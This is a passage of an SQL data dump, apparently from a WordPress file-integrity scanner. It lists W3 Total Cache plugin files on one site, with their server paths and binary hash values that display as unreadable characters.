ߓ=I)UeMТW-','',0,'?'),('CcVd','wp-content/plugins/w3-total-cache/Cdnfsd_LimeLight_Popup_View_Success.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_LimeLight_Popup_View_Success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_ڒLގ14<','›z,iBbA¡o,d,','',0,'?'),('0-;I_V','wp-content/plugins/w3-total-cache/Cdnfsd_Page_View_Header.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_Page_View_Header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bgY~t/*ܲ','ܡ\nl٥f&<F,Q','',0,'?'),('.g{pɏ`\np','wp-content/plugins/w3-total-cache/Cdnfsd_Plugin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_Plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E#zY0','ׂm z9şvJ#059','',0,'?'),('Zz5ߖ','wp-content/plugins/w3-total-cache/Cdnfsd_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 5VwH ','A18Š[g$G##5@g','',0,'?'),('{^]O','',0,'?'),('h\"aiD9','wp-content/plugins/w3-total-cache/Cdnfsd_StackPath2_Popup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_StackPath2_Popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l@,H=>`Z3','7+Dsrr a]&\rB\n>','',0,'?'),('2koXKNV','wp-content/plugins/w3-total-cache/Cdnfsd_StackPath2_Popup_View_Intro.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_StackPath2_Popup_View_Intro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T˔Slr\Zy{D','GE AuE\" f0>rfӰ\Z vC','',0,'?'),(' ׻2mC','wp-content/plugins/w3-total-cache/Cdnfsd_StackPath2_Popup_View_Sites.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_StackPath2_Popup_View_Sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"7Iˤac;A','fw[QtQDbbtC','',0,'?'),('W睨kג','wp-content/plugins/w3-total-cache/Cdnfsd_StackPath2_Popup_View_Stacks.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_StackPath2_Popup_View_Stacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nN0ELԨ[W4','kE\";\Z8AHgO»Ar06e[','',0,'?'),('#L\'FDr\'*3\'','wp-content/plugins/w3-total-cache/Cdnfsd_StackPath2_Popup_View_Success.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_StackPath2_Popup_View_Success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\. P#?E','ظ 5Qu1Eӎ AL','',0,'?'),('Kg]9KdX־y','wp-content/plugins/w3-total-cache/Cdnfsd_StackPath_Engine.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_StackPath_Engine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','10J$ ','wMG};|k~qοF*9\0K','',0,'?'),('mp 4\"}6>tG','wp-content/plugins/w3-total-cache/Cdnfsd_StackPath_Page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_StackPath_Page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"0T41l','@3HƮF3AA8֡|Ab@a','',0,'?'),('h0\'{\ZڏY/','wp-content/plugins/w3-total-cache/Cdnfsd_StackPath_Page_View.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_StackPath_Page_View.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2\\aX:en\Z=ˆx','~>;9_NXyaZYj`7K','',0,'?'),('Cۉ㚘2}c/R','wp-content/plugins/w3-total-cache/Cdnfsd_StackPath_Page_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_StackPath_Page_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ln}?5V','壘B\Z=l5e)8TI','',0,'?'),('n,2G_n<-^','wp-content/plugins/w3-total-cache/Cdnfsd_StackPath_Popup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_StackPath_Popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4`xmt','8\noͳU?%û1JA[','',0,'?'),('vFck_','wp-content/plugins/w3-total-cache/Cdnfsd_StackPath_Popup_View_Intro.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_StackPath_Popup_View_Intro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' /џl_yj \r)','] *aisjWNݑ\'=(*JOÝ','',0,'?'),('\'#y$yZ\'','wp-content/plugins/w3-total-cache/Cdnfsd_StackPath_Popup_View_Success.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_StackPath_Popup_View_Success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u\Z+_w','9kF$/4;K\"NnQ?','',0,'?'),('{qΖ ̫','wp-content/plugins/w3-total-cache/Cdnfsd_StackPath_Popup_View_Zone.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_StackPath_Popup_View_Zone.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rT^阴v','mu\ZwN^@=}!\n1','',0,'?'),('I22vhtU','wp-content/plugins/w3-total-cache/Cdnfsd_StackPath_Popup_View_Zones.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_StackPath_Popup_View_Zones.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n#','$n/;SՕr@r&%\'B5؅ ','',0,'?'),('&U־\":','wp-content/plugins/w3-total-cache/Cdnfsd_TransparentCDN_Engine.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_TransparentCDN_Engine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L@Js\ZF','~Ӯ\'k`%ðw0jrB','',0,'?'),('b?!8F~Nۚ','wp-content/plugins/w3-total-cache/Cdnfsd_TransparentCDN_Page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_TransparentCDN_Page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#>[Q\\\"/ӵ-','E\0{>80@|{hL&tY:','',0,'?'),(' (1S,','wp-content/plugins/w3-total-cache/Cdnfsd_TransparentCDN_Page_View.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_TransparentCDN_Page_View.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fp2r\n]Zu','NjSnx>]˱P_JcO','',0,'?'),('(! $\n!JX%','wp-content/plugins/w3-total-cache/Cdnfsd_TransparentCDN_Page_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_TransparentCDN_Page_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Ө2M@w','(EtӬs!B=А}`>M','',0,'?'),('`y1qq','wp-content/plugins/w3-total-cache/Cdnfsd_Util.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g{Y.mF','UaSlڄ};a cEm:zh,','',0,'?'),('a)_\nG','wp-content/plugins/w3-total-cache/Cli.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','楣@~','\nZճ\'=_\0ܓxgd%\0t','',0,'?'),('HsOn\rQ{','wp-content/plugins/w3-total-cache/Config.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','agSpL==NdVfs',':ط\\p-I7kA?ldyn\n','',0,'?'),('!xl[&I\n','wp-content/plugins/w3-total-cache/ConfigCache.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ConfigCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',sE; %','S<+96\'\"~Hh*UdT@8{','',0,'?'),('*xJu','wp-content/plugins/w3-total-cache/ConfigCompiler.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ConfigCompiler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~|T7Ck','6J\"k?,`^y%v4','',0,'?'),('#V\nDhf|','wp-content/plugins/w3-total-cache/ConfigDbStorage.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ConfigDbStorage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|p;y4x','(s`sC6f9@𬋐$ZKSbp','',0,'?'),('P)\n>@-?0T','wp-content/plugins/w3-total-cache/ConfigKeys.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ConfigKeys.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZفC#','wHYmb:J|t\n\\0 gkRrN;','',0,'?'),('\\Y)TT09C','wp-content/plugins/w3-total-cache/ConfigState.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ConfigState.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0R\'٠ ','H, Vp@5/6.&ٛ<\'}','',0,'?'),('ZV)ү!-hu)-\0','wp-content/plugins/w3-total-cache/ConfigStateNote.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ConfigStateNote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B[&;w8Ҡ','x1u+Y- E3 M=kwTD','',0,'?'),('rlnT? 36','wp-content/plugins/w3-total-cache/ConfigUtil.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/ConfigUtil.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G#Ktp&;ƄOq','PVU2 P H%CQp&D*\Z,','',0,'?'),('֖Μ_ %','wp-content/plugins/w3-total-cache/DbCache_ConfigLabels.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/DbCache_ConfigLabels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K6=5( ','g/7u|P0ǿLTm&','',0,'?'),('\Z\r)\ZO','wp-content/plugins/w3-total-cache/DbCache_Core.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/DbCache_Core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LESn< n','9 PkǸV*BU{P','',0,'?'),('VUPڔQa1','wp-content/plugins/w3-total-cache/DbCache_Environment.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/DbCache_Environment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']ܕ6YQ1','K>r(R(!0Z[\Z','',0,'?'),('r?>[T_OI','wp-content/plugins/w3-total-cache/DbCache_Page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/DbCache_Page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OD5[GQR8T','nB;pawDc-y \\Q','',0,'?'),('f,Mz*cig','wp-content/plugins/w3-total-cache/DbCache_Plugin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/DbCache_Plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'xr-V','>T;yY<{','',0,'?'),(')+|jg','wp-content/plugins/w3-total-cache/DbCache_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/DbCache_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lG0Cͧ7','u\\_Y͖熈a.4\r%X-qA‰','',0,'?'),('o?4B0U','wp-content/plugins/w3-total-cache/DbCache_Wpdb.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/DbCache_Wpdb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b/9O3\"\0yI','V9+FmpFۘvշQ>S ','',0,'?'),('@zMA2','wp-content/plugins/w3-total-cache/DbCache_WpdbBase.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/DbCache_WpdbBase.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M.ۇ7 \rK','?@F3ym)q{[&)` s4yTB]','',0,'?'),('P~Qe؀į','wp-content/plugins/w3-total-cache/DbCache_WpdbInjection.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/DbCache_WpdbInjection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S~̓%LG','5- mBtq˹\n\0_!rU$\Z','',0,'?'),('Uȏ4/lN@ w','wp-content/plugins/w3-total-cache/DbCache_WpdbInjection_QueryCaching.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/DbCache_WpdbInjection_QueryCaching.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z\nbQƽ>FB','\n\ngZ[/.\n+ a 2$ԙ','',0,'?'),('43Ѡ;:>p','wp-content/plugins/w3-total-cache/DbCache_WpdbLegacy.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/DbCache_WpdbLegacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A`\00Z6','xN ~֗Ix7PQkh8XY|','',0,'?'),('[vSm\0E\0','wp-content/plugins/w3-total-cache/DbCache_WpdbNew.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/DbCache_WpdbNew.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';/qG^[u>_B)9','',0,'?'),('%֗@-qh','wp-content/plugins/w3-total-cache/Enterprise_CacheFlush_MakeSnsEvent.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Enterprise_CacheFlush_MakeSnsEvent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';c8ưi棩','ى[0Y8D;H[# ] ','',0,'?'),('~CNC','wp-content/plugins/w3-total-cache/Enterprise_Dbcache_WpdbInjection_Cluster.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Enterprise_Dbcache_WpdbInjection_Cluster.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':R\\(fPt','jΐC\"\0|pH(0,d|.*h','',0,'?'),('Ϫ[a|','wp-content/plugins/w3-total-cache/Enterprise_SnsBase.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Enterprise_SnsBase.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J@I>F(zl','\ZcWv$j[ڹ8X-Eb?%','',0,'?'),('^}:*Sʪ,p','wp-content/plugins/w3-total-cache/Enterprise_SnsServer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Enterprise_SnsServer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vSb\nČVlCW','}ϰ׻H\\2v~','',0,'?'),('1&ݡTƋ','wp-content/plugins/w3-total-cache/Extension_Amp_Page_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_Amp_Page_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XU(E ','X|_]\"ya4ʕUdL{\'I','',0,'?'),('Q/_NmRĺ','wp-content/plugins/w3-total-cache/Extension_Amp_Plugin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_Amp_Plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>d_','뜲V_1`drsA$2-\rc','',0,'?'),('~Ql','wp-content/plugins/w3-total-cache/Extension_Amp_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_Amp_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fWl8.P','V RN=noh a$\r\0QGWH\'Tq','',0,'?'),('#\\Ľ(3\Z`r','wp-content/plugins/w3-total-cache/Extension_CloudFlare_AdminActions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_AdminActions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vpq 6>=','5Szn `FQ?','',0,'?'),('\"8@WjWd','wp-content/plugins/w3-total-cache/Extension_CloudFlare_Api.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','㕯̃ZkY4S','lXTAp9I<21ui`\noQѶYL6%','',0,'?'),('[_g*','wp-content/plugins/w3-total-cache/Extension_CloudFlare_Cdn_Page_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Cdn_Page_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' nm􎣽=(','w9f\'=:i)!x','',0,'?'),('ĞT[,lUy1','wp-content/plugins/w3-total-cache/Extension_CloudFlare_Page_View.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Page_View.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z\'J^>^',':!Si09xd 1vG<\r,/q[%1','',0,'?'),('ԖxOf)C','wp-content/plugins/w3-total-cache/Extension_CloudFlare_Page_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Page_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y<6vt',' x|>l6[;O!Óf','',0,'?'),('Q͝NՐc','wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bhcw?C3','MG8coj|{4̄v ^J7׶','',0,'?'),('QBkAui/|;','wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xP^`I@$','By_JQ,lWL!','',0,'?'),('L)\'C/DMr6','wp-content/plugins/w3-total-cache/Extension_CloudFlare_Popup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}fmEU?y!Cg','^BQx~ʌJ8','',0,'?'),('ȸPU,$~','wp-content/plugins/w3-total-cache/Extension_CloudFlare_Popup_View_Intro.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Popup_View_Intro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')\\0ﷁc','鱕M“,^&]ba5Y\\','',0,'?'),('ڮ.S9 7:','wp-content/plugins/w3-total-cache/Extension_CloudFlare_Popup_View_Zones.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Popup_View_Zones.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i0վ3=J',' ?7d$;:d*J','',0,'?'),('W {~ͺ','wp-content/plugins/w3-total-cache/Extension_CloudFlare_SettingsForUi.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_SettingsForUi.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x>Q;4 $f3','b5N57RY:ZS(ZQ\\<6','',0,'?'),('*;7','wp-content/plugins/w3-total-cache/Extension_CloudFlare_View_Dashboard.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_View_Dashboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rzt(ˊ|k','q\Z[ѓG\0@./Gi1g~c','',0,'?'),('#)j TP!d','wp-content/plugins/w3-total-cache/Extension_CloudFlare_Widget.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LKg','|BpJBL[YIZȼ3g','',0,'?'),('a!','wp-content/plugins/w3-total-cache/Extension_CloudFlare_Widget_Logo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Widget_Logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tp1QKt','jY:C=8ygjt| hըls4Fw','',0,'?'),('󫘤 $;X','wp-content/plugins/w3-total-cache/Extension_CloudFlare_Widget_View.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Widget_View.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SP]9꺍5ow','7WhK]2ulp 3K.7C*','',0,'?'),('RR?Kv} 2z','wp-content/plugins/w3-total-cache/Extension_CloudFlare_Widget_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Widget_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(FdⓆ8Өn','wٺ\\I❹t}-Z~O','',0,'?'),('*RFK{L','wp-content/plugins/w3-total-cache/Extension_FragmentCache_Api.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_FragmentCache_Api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!#բ@<1ՈTq+','ӎ+C85_:]Kй_','',0,'?'),(']F$qy','wp-content/plugins/w3-total-cache/Extension_FragmentCache_Core.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_FragmentCache_Core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s̅)[(d{','a!k8X/y$CP-[SyS','',0,'?'),('zg:Mqj8','wp-content/plugins/w3-total-cache/Extension_FragmentCache_Environment.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_FragmentCache_Environment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E%r(:x03g\0a','@ y$U@uh` |q','',0,'?'),('خ_7i{','wp-content/plugins/w3-total-cache/Extension_FragmentCache_GeneralPage.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_FragmentCache_GeneralPage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XXZ','܃\rc? L\Zm{\0C*x{','',0,'?'),('$҄Ms+','wp-content/plugins/w3-total-cache/Extension_FragmentCache_GeneralPage_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_FragmentCache_GeneralPage_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' F\Z\\^r3k~b ','0bRJJ#q<̒^','',0,'?'),('%\\\r&X&pP','wp-content/plugins/w3-total-cache/Extension_FragmentCache_Page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_FragmentCache_Page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y-\'5c5','\"lU6&95\Zsd֊\'','\"{0FR!_tI78','',0,'?'),('I%I9bNӳ/','wp-content/plugins/w3-total-cache/Extension_FragmentCache_Plugin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_FragmentCache_Plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*z\"2Dƚ8','f*K1rCA1\r!M:E','',0,'?'),(',ˏ =X','wp-content/plugins/w3-total-cache/Extension_FragmentCache_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_FragmentCache_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y`*\ZFA','A~?|!r/~`~h32躥','',0,'?'),('c?`BQ,g','wp-content/plugins/w3-total-cache/Extension_FragmentCache_WpObjectCache.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_FragmentCache_WpObjectCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q\"ȥ &b*','0Ws\\Í1Fң+G\\n<<Tz','',0,'?'),('Abt#Ȅ/-Ն','wp-content/plugins/w3-total-cache/Extension_Genesis_Page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_Genesis_Page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{?g&.','AuD:`PBJp?h','',0,'?'),('kF*jv_6','wp-content/plugins/w3-total-cache/Extension_Genesis_Page_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_Genesis_Page_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d.񎹻ƶ','koP;T?qISB;d','',0,'?'),('[3|FZ:w)0','wp-content/plugins/w3-total-cache/Extension_Genesis_Plugin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_Genesis_Plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CgZ_sRje','u:Z|,]f&qqO\"Ţ^','',0,'?'),('DFfdעnx7MW','wp-content/plugins/w3-total-cache/Extension_Genesis_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_Genesis_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L@Ky4','90 {ڋH6xn=\0I','',0,'?'),('tftܩp','wp-content/plugins/w3-total-cache/Extension_ImageService_Api.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_ImageService_Api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bLkGg/\n9','t ٴao\\$:*{v9,T','',0,'?'),('t*`%t','wp-content/plugins/w3-total-cache/Extension_ImageService_Cron.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_ImageService_Cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W(l~)xI *','r`y_Ñ:/gf_$䩫)','',0,'?'),('S)t#w','wp-content/plugins/w3-total-cache/Extension_ImageService_Environment.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_ImageService_Environment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ÛW8m)\rܟ','G;˒3Ip<*2ֺV{b','',0,'?'),('#8.|%Z','wp-content/plugins/w3-total-cache/Extension_ImageService_Page_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_ImageService_Page_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','On5_d?','XЁpQ(8J>ѻTt9','',0,'?'),('x@CNYb','wp-content/plugins/w3-total-cache/Extension_ImageService_Plugin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_ImageService_Plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zaПpes','Ӑv9wj.gL͏Ac}{k','',0,'?'),('덼Ԑ{~S҇/+','wp-content/plugins/w3-total-cache/Extension_ImageService_Plugin_Admin.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_ImageService_Plugin_Admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 6gC9;{y',':\n f$OC`ú<ܐ','',0,'?'),('\' V\nKb','wp-content/plugins/w3-total-cache/Extension_ImageService_Plugin_Admin.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_ImageService_Plugin_Admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z3ɃS\\^>','T2tP-d#i ϳW]','',0,'?'),('wP9IE','wp-content/plugins/w3-total-cache/Extension_ImageService_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_ImageService_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')\"u_ذAW','Ȱ=0Osq[Rʹ','',0,'?'),('4bʨ .','wp-content/plugins/w3-total-cache/Extension_NewRelic_AdminActions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Extension_NewRelic_AdminActions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&&~%>i9&<',' 